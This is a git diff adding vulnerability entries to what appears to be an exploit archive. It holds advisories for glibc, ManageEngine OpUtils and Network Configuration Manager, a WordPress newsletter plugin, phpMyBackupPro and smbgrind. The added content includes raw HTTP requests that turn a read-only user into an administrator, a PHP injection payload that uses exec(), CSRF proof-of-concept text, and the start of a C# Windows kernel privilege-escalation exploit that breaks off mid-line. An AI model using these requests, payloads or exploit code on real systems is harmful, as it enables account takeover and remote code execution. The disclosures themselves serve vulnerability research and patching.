diff --git a/files.csv b/files.csv index e67aa04a7..13faba61a 100755 --- a/files.csv +++ b/files.csv @@ -34937,7 +34937,7 @@ id,file,description,date,author,platform,type,port 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Stored XSS Vulnerability",2015-11-09,Nu11By73,hardware,webapps,0 39374,platforms/osx/dos/39374.c,"OS X Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0 -38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More PHP Upload Vulnerability",2015-11-09,metasploit,php,remote,0 +38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More 2.8.1.1 - PHP Upload Vulnerability",2015-11-09,metasploit,php,remote,0 38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - CSRF Vulnerability",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0 38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0 @@ -35688,3 +35688,9 @@ id,file,description,date,author,platform,type,port 39446,platforms/win32/local/39446.py,"Microsoft Windows - AFD.SYS Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win32,local,0 39447,platforms/windows/dos/39447.py,"Network Scanner Version 4.0.0.0 - SEH Crash POC",2016-02-15,INSECT.B,windows,dos,0 39448,platforms/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80 +39449,platforms/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 +39450,platforms/multiple/webapps/39450.txt,"ManageEngine Network Configuration Management Build 11000 - Privilege Escalation",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 +39451,platforms/php/webapps/39451.txt,"WordPress ALO EasyMail Newsletter Plugin 2.6.01 - CSRF Vulnerability",2016-02-16,"Mohsen Lotfi",php,webapps,80 +39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 +39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0 +39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0 diff --git a/platforms/linux/dos/39454.txt b/platforms/linux/dos/39454.txt new file mode 100755 index 000000000..16f45103c --- /dev/null +++ b/platforms/linux/dos/39454.txt @@ -0,0 +1,34 @@ +Sources: +https://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html +https://github.com/fjserna/CVE-2015-7547 + +Technical information: + +glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. + +Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated. + +Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow. + +The vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further. + +We are providing this code as-is. You are responsible for protecting yourself, +your property and data, and others from any risks caused by this code. This +code may cause unexpected and undesirable behavior to occur on your machine. +This code may not detect the vulnerability on your system. + +Note that this POC consists of two components: server code and client code. +The server code triggers the vulnerability and therefore will crash the client +code. Note also that it is necessary to set the nameserver to point to the +server code, and doing so could cause other programs that call into the +getaddrinfo() function to crash while testing is underway. This POC code is +provided "as is" with no warranties, whether express or implied, including +without limitation any warranties or merchantability, fitness for a particular +use and noninfringement. Google assumes no responsibility for your proper +installation and use of the POC code. + + +Proof of Concept: +https://github.com/fjserna/CVE-2015-7547/archive/master.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39454-1.zip + diff --git a/platforms/multiple/webapps/39449.txt b/platforms/multiple/webapps/39449.txt new file mode 100755 index 000000000..4ac41d6b5 --- /dev/null +++ b/platforms/multiple/webapps/39449.txt @@ -0,0 +1,308 @@ +=================================================================================== +Privilege escalation Vulnerability in ManageEngine oputils +=================================================================================== + +Overview +======== + +Title:- Privilege escalation Vulnerability in ManageEngine oputils +Author: Kaustubh G. Padwad +Vendor: ZOHO Corp +Product: ManageEngine oputils +Tested Version: : oputils 8.0 +Severity: HIGH + +Advisory ID +============ +2016-05-Manage_Engine + +About the Product: +================== +OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more. + +Description: +============ + +This Privilege escalation vulnerability enables an Normal user to escalate privilege and become administrator of the application. + +Vulnerability Class: +==================== +Top 10 2014-I2 Insufficient Authentication/Authorization https://www.owasp.org/index.php/Top_10_2014-I2_Insufficient_Authentication/Authorization + +How to Reproduce: (POC): +======================== + +* you should have Read only user on OpUtils + +* login with that account to get api key something like 375e0fa0-0bb3-479c-a646-debb90a1f5f0 + +* Setup Burp and use change user password request and change userName to admin and newPwd to desire password HUrry you are admin now. :) + +POC +==== + +Burp Requst +----------- +POST /oputilsapi/admin?key=375e0fa0-0bb3-479c-a646-debb90a1f5f0 HTTP/1.1 + +Host: 192.168.1.10:7080 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 + +Accept: application/json, text/javascript, */*; q=0.01 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +X-Requested-With: XMLHttpRequest + +Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp + +Content-Length: 151 + +Cookie: OPUTILSJSESSIONID=AC6E9B2C01FDDD5E27C245BC6F31C032; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66 + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + + +v=1&format=json&operation=DELETE_OR_MODIFY_USER&action1=MODIFY_USER&userInAction=kk&userRole=Administrator&userAuthType=Local&contactinfoID=2&loginID=2 + + +Response +-------- +HTTP/1.1 200 OK + +Server: Apache-Coyote/1.1 + +Set-Cookie: OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66; Expires=Thu, 01-Jan-1970 00:00:10 GMT + +Set-Cookie: OPUTILSJSESSIONID=184C572A3D2E17EEC3B78C027B925421; Path=/ + +Content-Type: application/json;charset=UTF-8 + +Content-Length: 90 + +Date: Thu, 04 Feb 2016 13:27:09 GMT + + + +{"input":"{newUserName=MODIFY_USER, userInAction=kk, domainName=null}","status":"Success"} + + +Mitigation +========== +Upgrade to next Service pack + +Disclosure: +=========== +04-Feb-2016 Repoerted to vendor +11-Feb-2016 Fixed By vendor + +################################################################################ + +==================================================================================================== +Missing Function Level Access control Vulnerability in OPutils +==================================================================================================== + +Overview +======== + +Title:- Missing Function Level Access control Vulnerability in ManageEngine OpUtils +Author: Kaustubh G. Padwad +Vendor: ZOHO Corp +Product: OPUTILS +Tested Version: : OPUTILS 8.0 +Severity: Medium + +Advisory ID +============ +2016-06-Manage_Engine + +Description: +============ + +This Missing Function Level Access Control vulnerability enables an Normal user to execute the Adinisitative Task. + +Vulnerability Class: +==================== +2013-A7-Missing Function Level Access Control https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control + +How to Reproduce: (POC): +======================== + +* Get The administrative Task URL from either demo site or download locally + +* Now Login With Normal User + +* Paste the below requst or any other for Ex. http://IP-OF-Server:7080/oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS + +POC +==== + +Burp Requst +----------- +GET /oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS HTTP/1.1 + +Host: 192.168.1.10:7080 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 + +Accept: */* + +Accept-Language: en-US,en;q=0.5 + + + +Response +-------- + + +HTTP/1.1 200 OK +erver: Apache-Coyote/1.1 + +Content-Type: application/json;charset=UTF-8 + +Content-Length: 589 + +Date: Thu, 04 Feb 2016 14:28:25 GMT + + + +{"result":[{"ad-domain-name":"","user-name":"admin","account-created-time":"30 Jan 16, 12:20 AM","Action":"","user-contactinfo-id":"1","user-role":"Administrator","user-description":"--","user-phone-number":"","user-email":"","user-id":"1","ad-domain-id":"","user-login-id":"1"},{"ad-domain-name":"","user-name":"kk","account-created-time":"30 Jan 16, 12:23 AM","Action":"","user-contactinfo-id":"2","user-role":"Read Only User","user-description":"--","user-phone-number":"","user-email":"","user-id":"2","ad-domain-id":"","user-login-id":"2"}],"input":"{userId=null}","status":"Success"} +Server: Apache-Coyote/1.1 + +Access-Control-Allow-Origin: * + +Access-Control-Allow-Methods: GET,POST + +Access-Control-Max-Age: 5000 + +Content-Type: application/json;charset=UTF-8 + +Date: Sat, 30 Jan 2016 21:39:03 GMT + +Content-Length: 19 + + + +{"resolved":true} + +Accept-Encoding: gzip, deflate + +X-Requested-With: XMLHttpRequest + +Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp + +Cookie: OPUTILSJSESSIONID=C256E5B41CC23B33ACF94D206E243FB2; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=28A377BA0B7D0C6E21D1E2B3A3E4A371 + +Connection: keep-alive + +Mitigation +========== +Upgrade to NextService Pack + +Disclosure: +=========== +04-Feb-2016 Repoerted to vendor +11-Feb-2016 Fixed By Vendor + +################################################################################ + +=============================================================================== +CSRF and XXS In Manage Engine oputils +=============================================================================== + +Overview +======== + +* Title : CSRF and XSS In Manage Engine OPutils +* Author: Kaustubh G. Padwad +* Plugin Homepage: https://www.manageengine.com/products/oputils/ +* Severity: HIGH +* Version Affected: Version 8.0 +* Version Tested : Version 8.0 +* version patched: + +Advisory ID +============ +2016-01-Manage_Engine + +Description +=========== + +Vulnerable Parameter +-------------------- +1. RouterName +2. action Form +3. selectedSwitchTab +4. ipOrHost +5. alertMsg +6. hostName +7. switchID +8. oidString + +About Vulnerability +------------------- +This Application is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin?s browser can be made t do almost anything the admin user could typically do by hijacking admin's cookies etc. + +Vulnerability Class +=================== +Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) +Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) + +Steps to Reproduce: (POC) +========================= + +* Add follwing code to webserver and send that malicious link to application Admin. +* The admin should be loggedin when he clicks on the link. +* Soical enginering might help here + +For Example :- Device password has been changed click here to reset + +####################CSRF COde####################### + + + + +
+ + tubh" /> + + + + + + + + + + +Mitigation +========== +Upgrade to next service pack + +Change Log +========== + +Disclosure +========== +28-January-2016 Reported to Developer +28-January-2016 Acknodlagement from developer +11-February-2016 Fixed by vendor () + +credits +======= +* Kaustubh Padwad +* Information Security Researcher +* kingkaustubh@me.com +* https://twitter.com/s3curityb3ast +* http://breakthesec.com +* https://www.linkedin.com/in/kaustubhpadwad diff --git a/platforms/multiple/webapps/39450.txt b/platforms/multiple/webapps/39450.txt new file mode 100755 index 000000000..bca9eaa17 --- /dev/null +++ b/platforms/multiple/webapps/39450.txt @@ -0,0 +1,128 @@ +=================================================================================== +Privilege escalation Vulnerability in ManageEngine Network Configuration Management +=================================================================================== + +Overview +======== + +Title:- Privilege escalation Vulnerability in ManageEngine Network Configuration Management +Author: Kaustubh G. Padwad +Vendor: ZOHO Corp +Product: ManageEngine Network Configuration Manager +Tested Version: : Network Configuration Manager Build 11000 +Severity: HIGH + +Advisory ID +============ +2016-03-Manage_Engine + +About the Product: +================== + +Network Configuration Manager is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, Network Configuration Manager helps automate and take total control of the entire life cycle of device configuration management. + +Description: +============ + +This Privilege escalation vulnerability enables an Normal user to escalate privilege and become administrator of the application. + +Vulnerability Class: +==================== +Top 10 2014-I2 Insufficient Authentication/Authorization https://www.owasp.org/index.php/Top_10_2014-I2_Insufficient_Authentication/Authorization + + +How to Reproduce: (POC): +======================== + +* you should have Operator Account on Network Configuration Management + +* login with that account to get api key something like user_1453993872278 + +* Setup Burp and use change user password request and change userName to admin and newPwd to desire password HUrry you are admin now. :) + +POC +==== + +Burp Requst +----------- +POST /nfaapi/json/admin/changePassword HTTP/1.1 + +Host: 192.168.1.10:8080 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 + +Accept: */* + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +X-Requested-With: XMLHttpRequest + +Referer: http://192.168.1.10:8080/netflow/ncmapiclient/ember/index.jsp + +Content-Length: 50 + +Cookie: OPUTILSJSESSIONID=E062B23129AA1269EF13794C7710DF8E; JSESSIONID=FBA6ADEE16123786896DF765CA4C9E87; NFA_Jsession=0BF63F9CE8F4DCF664857F92403D8B44; iamcsrfcookie=fbcc4bcb-34ea-4cc8-8cb3-e95dbfc0603d; NFA__SSO=0ED579E64493B973F5BCA1C94EAD6310 + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + + +userName=admin&newPwd=11&apiKey=king_1453993872278 + + +Response +-------- +HTTP/1.1 200 OK + +Server: Apache-Coyote/1.1 + +Access-Control-Allow-Origin: * + +Access-Control-Allow-Methods: GET,POST + +Access-Control-Max-Age: 5000 + +Content-Type: application/json;charset=UTF-8 + +Date: Sat, 30 Jan 2016 20:22:15 GMT + +Content-Length: 23 + + + +{"message":"success"} + + + +Mitigation +========== + +* Please Stop Network configuration manager service. +* Open Ncm\lib and cut AdvNCM.jar and paste it in to Desktop. +* Download the AdvNCM.jar file from below link and paste it under Ncm\lib +* https://uploads.zohocorp.com/Internal_Useruploads/dnd/DeviceExpert/o_1ab396o1i1a6v8j1cr86uet581/AdvNCM.jar +* Open Ncm\logs and delete all the files inside it, +* Start the Ncm service and check the issue. + +Disclosure: +=========== +* 31-JAN-2016 Repoerted to vendor +* 31-Feb-2016 Ack by Vendor +* 09-Feb-2016 Fixed By Vendor + +credits: +======== +* Kaustubh Padwad +* Information Security Researcher +* kingkaustubh@me.com +* https://twitter.com/s3curityb3ast +* http://breakthesec.com +* https://www.linkedin.com/in/kaustubhpadwad diff --git a/platforms/php/webapps/39451.txt b/platforms/php/webapps/39451.txt new file mode 100755 index 000000000..c377cc729 --- /dev/null +++ b/platforms/php/webapps/39451.txt @@ -0,0 +1,85 @@ +# Exploit Title: Wordpress ALO EasyMail Newsletter plugin cross-site request forgery vulnerability +# Software Link: https://wordpress.org/plugins/alo-easymail/ +# Affected Version: 2.6.01 +# Exploit Author: Mohsen Lotfi +# Contact: mohsen.lotfi.all@gmail.com +# Twitter: fox_one_fox_one +# Date: 01-16-2016 + +##################### +1. Description +##################### + +The plugin contains a CSRF vulnerability, which can be exploited to perform a script insertion attack. + +script insertion happens in wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php : + + case "save_list": // SAVE a mailing list (add or update) + if ( isset($_REQUEST['submit_list']) ) { + //$list_name = stripslashes( trim( $_POST['elp_list_name'] ) ); + + // List name + $list_name = array(); + foreach ( $languages as $key => $lang ) { + if (isset($_POST['listname_'.$lang]) ) $list_name[$lang] = stripslashes(trim($_POST['listname_'.$lang])); /* script insertion here */ + } + + $list_available = stripslashes( trim( $_POST['elp_list_available'] ) ); + $list_order = stripslashes( trim( $_POST['elp_list_order'] ) ); + if ( $list_name && $list_available && is_numeric($list_order) ) { + $mailinglists = alo_em_get_mailinglists ( 'hidden,admin,public' ); + if ( $list_id ) { // update + $mailinglists [$list_id] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order ); + } else { // or add a new + if ( empty($mailinglists) ) { // if 1st list, skip index 0 + $mailinglists [] = array ( "name" => "not-used", "available" => "deleted", "order" => ""); + } + $mailinglists [] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order); + } + if ( alo_em_save_mailinglists ( $mailinglists ) ) { + unset ( $list_id ); + unset ( $list_name ); + unset ( $list_available ); + unset ( $list_order ); + echo '

'. __("Updated", "alo-easymail") .'

'; + } else { + echo '

'. __("Error during operation.", "alo-easymail") .'

'; + } + } else { + echo '

'. __("Inputs are incompled or wrong. Please check and try again.", "alo-easymail") .'

'; + } + } + break; + + +##################### +2. Proof of Concept +##################### + +Login as regular user then: + +
+ + + + + + + +
+ + +##################### +3. Sulotion +##################### + +Update to version 2.7.0 +https://wordpress.org/plugins/alo-easymail/changelog/ + +##################### +4. Report Timeline +##################### + +01-16-2016 : Vulnerability discovered. +01-25-2016 : Vendor notified of vulnerability. +02-07-2016 : Vendor replied and released fixed version. \ No newline at end of file diff --git a/platforms/php/webapps/39453.txt b/platforms/php/webapps/39453.txt new file mode 100755 index 000000000..ff273d083 --- /dev/null +++ b/platforms/php/webapps/39453.txt @@ -0,0 +1,147 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-RCE.txt + + +Vendor: +============================= +www.phpmybackuppro.net + +project site: +sourceforge.net/projects/phpmybackup/ + + +Product: +=========================== +phpMyBackupPro v.2.5 (PMBP) + +phpMyBackup Pro is a very easy to use, free, web-based MySQL backup +application, licensed under the GNU GPL. +You can create scheduled backups, manage and restore them, download or +email them and a lot more. + + +Vulnerability Type: +========================= +Remote Command Execution / CSRF + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +===================== + +phpMyBackupPro uses PHP configuration files (global_conf.php) to manage +settings, allowing user to change things like sql host, language, email +etc.. +However, a malicious local user can also inject persistent arbitrary PHP/OS +commands into the configuration to be executed on the host system. +The remote command execution can also be a result of a CSRF driveby by if +currently logged admin visits an attackers webpage. + +Attackers can inject and write to disk arbitrary PHP code into the +global_conf.php configuration file if a victim visits a malicious webpage +or clicks an +infected link via a CSRF vector or additionally from a local malicious user +in shared host type environment. + +first we escape the single quotes etc... so we can close the expected +entry, then we leverage the backtick "`" operator to have PHP execute OS +commands +on victims system as it works just as well without having to deal with all +the quote escaping. + +e.g. payload that handles the single "'" quote an forward slashes "/"... + +''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\'; + + +The above when injected will result in a write to $CONF variables in +global_conf.php as follows... + +$CONF['lang']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); +///\';'); + +OR... + +$CONF['email']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); +///\';'); + + +Exploit code(s): +=============== + +Send admin infected link or convince them to visit our malicious webpage, +then if the user is logged in and... +a) clicks our link or visits our evil webpage or +b) submits the form locally (malicious user) then BOOOOOOOOOOOM! + + +Exploit to run calc.exe on Windows + + + + +Disclosure Timeline: +===================================== +Vendor Notification: NR +February 16, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +================ +High + + +Description: +============================================================= + +Request Method(s): [+] POST + + +Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP) + + +Vulnerable Parameter(s): [+] $CONF + +============================================================ + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +by hyp3rlinx diff --git a/platforms/windows/dos/39452.txt b/platforms/windows/dos/39452.txt new file mode 100755 index 000000000..21baa2f8a --- /dev/null +++ b/platforms/windows/dos/39452.txt @@ -0,0 +1,105 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/SMBGRIND-BUFFER-OVERFLOW.txt + + + +Vendor: +======================= +Network Associates Inc. + + + +Product: +=========================================== +smbgrind: NetBIOS parallel password grinder +circa 1996-1999 + +smbgrind.exe is a component of CyberCop Scanner v5.5. It is intended to +remotely crack SMB +usernames and passwords, used to establish a login session to the remote +NetBIOS file server. +Cybercop was discontinued back in 2002. + + usage: smbgrind -i
[options] + + -r Remote NetBIOS name of destination host + -i IP address of destination host + -u Name of userlist file (default NTuserlist.txt) + -p Name of password list file (default NTpasslist.txt) + -l Number of simultaneous connections (max: 50 default: 10) + -v Provide verbose output on progress + + + +Vulnerability Type: +=================== +Buffer Overflow + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +====================== + +Smbgrind.exe succumbs to buffer overflow when supplied a large number of +bytes (1206) for the -r switch for the remote +NetBios name of destination host. Resulting in memory corruption +overwriting several registers... + +GDB dump... + +Program received signal SIGSEGV, Segmentation fault. +0x0040c421 in ?? () +(gdb) info r +eax 0x3 3 +ecx 0x41414141 1094795585 +edx 0x41414141 1094795585 +ebx 0x41414141 1094795585 +esp 0x241e89c 0x241e89c +ebp 0x241e8a8 0x241e8a8 +esi 0x401408 4199432 +edi 0x41414141 1094795585 +eip 0x40c421 0x40c421 +eflags 0x10283 [ CF SF IF RF ] +cs 0x23 35 +ss 0x2b 43 +ds 0x2b 43 +es 0x2b 43 +fs 0x53 83 +gs 0x2b 43 +(gdb) + + +smbgrind core dump file... + +(C:\smbgrind.exe 1000) exception C0000005 at 40C421 + +(C:\smbgrind.exe 1000) exception: ax 2 bx 41414141 cx 41414141 dx 41414141 + +(C:\smbgrind.exe 1000) exception: si 401408 di 41414141 bp 241F39C sp +241F390 + +(C:\smbgrind.exe 1000) exception is: STATUS_ACCESS_VIOLATION + + + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +hyp3rlinx diff --git a/platforms/windows/local/39432.c b/platforms/windows/local/39432.c new file mode 100755 index 000000000..52ec634f8 --- /dev/null +++ b/platforms/windows/local/39432.c @@ -0,0 +1,276 @@ +/* + +Source: https://github.com/koczkatamas/CVE-2016-0051 + +Proof-of-concept BSoD (Blue Screen of Death) code for CVE-2016-0051 (MS-016). + +Full Proof of Concept: +https://github.com/koczkatamas/CVE-2016-0051/archive/master.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39432-1.zip + + +Elevation of Privilege (SYSTEM) exploit for CVE-2016-0051 (MS16-016) for Windows 7 SP1 x86 (build 7601) +Creator: Tamás Koczka (@koczkatamas - https://twitter.com/koczkatamas) +Original source: https://github.com/koczkatamas/CVE-2016-0051 + +*/ +using System; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Net; +using System.Net.Sockets; +using System.Runtime.InteropServices; +using System.Security.Principal; +using System.Text; +using System.Threading; + +namespace EoP +{ + class Program + { + #region Fake WebDAV server + + static void StartFakeWebDavServer(int port) + { + new Thread(() => + { + var server = new TcpListener(IPAddress.Loopback, port); + server.Start(); + while (true) + { + using (var client = server.AcceptTcpClient()) + using (var stream = client.GetStream()) + using (var reader = new StreamReader(stream, Encoding.GetEncoding("iso-8859-1"))) + using (var writer = new StreamWriter(stream, Encoding.GetEncoding("iso-8859-1")) { AutoFlush = true }) + { + Func rl = () => + { + var line = reader.ReadLine(); + //Console.WriteLine("< " + line); + return line; + }; + + Action wl = outData => + { + //Console.WriteLine(String.Join("\n", outData.Split('\n').Select(x => "> " + x))); + writer.Write(outData); + }; + + var hdrLine = rl(); + Console.WriteLine("[*] Request: " + hdrLine); + + var header = hdrLine.Split(' '); + while (!string.IsNullOrEmpty(rl())) { } + + if (header[0] == "OPTIONS") + wl("HTTP/1.1 200 OK\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nAllow: OPTIONS,GET,HEAD,PROPFIND\r\n\r\n"); + else if (header[0] == "PROPFIND") + { + var body = String.Format(@" + + + + {0} + + + {1:s}Z + {3} + {4} + {5} + {6:R} + {8} + + {7} + + HTTP/1.1 200 OK + + +", header[1], DateTime.UtcNow.ToUniversalTime(), "", "0", "", "", DateTime.UtcNow.ToUniversalTime(), 0, header[1].Contains("file") ? "" : "").Trim(); + + wl("HTTP/1.1 207 Multi-Status\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nContent-Length: " + body.Length + "\r\nContent-Type: text/xml\r\n\r\n" + body); + } + else + wl("HTTP/1.1 500 Internal Server Error\r\n\r\n"); + + //Console.WriteLine(" =============== END REQUEST =============== "); + } + } + }) { IsBackground = true, Name = "WebDAV server thread" }.Start(); + } + + #endregion + + #region WinAPI + + [DllImport("kernel32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)] + public static extern IntPtr CreateFile(string lpFileName, uint dwDesiredAccess, uint dwShareMode, IntPtr securityAttributes, uint dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile); + + [StructLayout(LayoutKind.Sequential)] + private class NETRESOURCE + { + public uint dwScope = 0; + public uint dwType = 0; + public uint dwDisplayType = 0; + public uint dwUsage = 0; + public string lpLocalName = null; + public string lpRemoteName = null; + public string lpComment = null; + public string lpProvider = null; + } + + [DllImport("mpr.dll")] + private static extern int WNetAddConnection2(NETRESOURCE lpNetResource, string lpPassword, string lpUsername, int dwFlags); + + // based on http://www.codeproject.com/Articles/21974/Windows-NT-Native-API-Wrapper-Library + + public enum PageProtection : uint + { + NOACCESS = 0x01, + READONLY = 0x02, + READWRITE = 0x04, + WRITECOPY = 0x08, + EXECUTE = 0x10, + EXECUTE_READ = 0x20, + EXECUTE_READWRITE = 0x40, + EXECUTE_WRITECOPY = 0x80, + GUARD = 0x100, + NOCACHE = 0x200, + WRITECOMBINE = 0x400 + } + + [Flags] + public enum MemoryAllocationType : uint + { + COMMIT = 0x1000, + RESERVE = 0x2000, + FREE = 0x10000, + PRIVATE = 0x20000, + MAPPED = 0x40000, + RESET = 0x80000, + TOP_DOWN = 0x100000, + WRITE_WATCH = 0x200000, + ROTATE = 0x800000, + LARGE_PAGES = 0x20000000, + PHYSICAL = 0x400000, + FOUR_MB_PAGES = 0x80000000 + } + + [DllImport("ntdll.dll", ThrowOnUnmappableChar = true, BestFitMapping = false, SetLastError = false)] + public static extern NtStatus NtAllocateVirtualMemory([In] IntPtr processHandle, [In, Out] ref IntPtr baseAddress, [In] uint zeroBits, [In, Out] ref UIntPtr regionSize, [In] MemoryAllocationType allocationType, [In] PageProtection protect); + + public enum FileOpenInformation + { + Superceded = 0x00000000, + Opened = 0x00000001, + Created = 0x00000002, + Overwritten = 0x00000003, + Exists = 0x00000004, + DoesNotExist = 0x00000005 + } + + internal enum NtStatus : uint + { + SUCCESS = 0x00000000, + INVALID_PARAMETER_1 = 0xC00000EF, + INVALID_PARAMETER_2 = 0xC00000F0, + INVALID_PARAMETER_3 = 0xC00000F1, + INVALID_PARAMETER_4 = 0xC00000F2, + // don't care + } + + internal struct IoStatusBlock + { + public NtStatus status; + public InformationUnion Information; + + [StructLayout(LayoutKind.Explicit)] + public struct InformationUnion + { + [FieldOffset(0)] + public FileOpenInformation FileOpenInformation; + [FieldOffset(0)] + public uint BytesWritten; + [FieldOffset(0)] + public uint BytesRead; + } + } + + [DllImport("ntdll.dll", ThrowOnUnmappableChar = true, BestFitMapping = false, SetLastError = false, ExactSpelling = true, PreserveSig = true)] + public static extern NtStatus NtFsControlFile([In] IntPtr fileHandle, [In, Optional] IntPtr Event, [In, Optional] IntPtr apcRoutine, [In, Optional] IntPtr apcContext, [Out] out IoStatusBlock ioStatusBlock, [In] uint fsControlCode, [In, Optional] IntPtr inputBuffer, [In] uint inputBufferLength, [Out, Optional] IntPtr outputBuffer, [In] uint outputBufferLength); + + [UnmanagedFunctionPointer(CallingConvention.StdCall)] + delegate int LoadAndGetKernelBasePtr(); + + [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] + static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); + + [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] + static extern IntPtr GetProcAddress(IntPtr hModule, string procName); + + #endregion + + private static byte[] il(params uint[] inp) { return inp.SelectMany(BitConverter.GetBytes).ToArray(); } + private static byte[] z(int c) { return rep(0, c); } + private static byte[] rep(byte b, int c) { return Enumerable.Repeat(b, c).ToArray(); } + private static byte[] fl(byte[][] inp) { return inp.SelectMany(x => x).ToArray(); } + + public static void Main(string[] args) + { + var shellcodeDll = 